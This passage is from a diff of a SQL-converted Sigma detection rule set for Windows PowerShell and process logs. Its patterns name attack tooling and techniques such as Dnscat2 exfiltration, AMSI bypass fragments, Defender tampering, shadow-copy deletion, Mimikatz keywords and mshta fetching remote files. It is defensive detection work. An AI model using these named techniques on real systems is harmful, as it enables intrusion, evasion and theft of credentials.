'\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + 
"filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "title": "WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.exfiltration", - "attack.t1048", "attack.execution", + "attack.t1047", "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + "Administrative scripts that use the same keywords." ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText 
LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" ], - "filename": "posh_ps_dnscat_execution.yml" + "filename": "posh_ps_wmimplant.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND 
ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. 
Or set default actions to allow.", + "author": "frack113", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 
$true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", - "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" - ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" - }, - { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", - "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.credential_access", - "attack.t1556.002" - ], - "falsepositives": [ - "Unknown" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": "posh_pc_remote_powershell_session.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", - "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "status": "test", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as 
used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "status": "test", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - 
"attack.t1216" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1218.005" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE 
'%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "status": "test", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT 
(NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_tamper_defender.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", "status": "test", - "description": "Detects suspicious PowerShell invocation command parameters", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "proc_creation_win_regedit_trustedinstaller.yml" }, { - "title": "Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the 
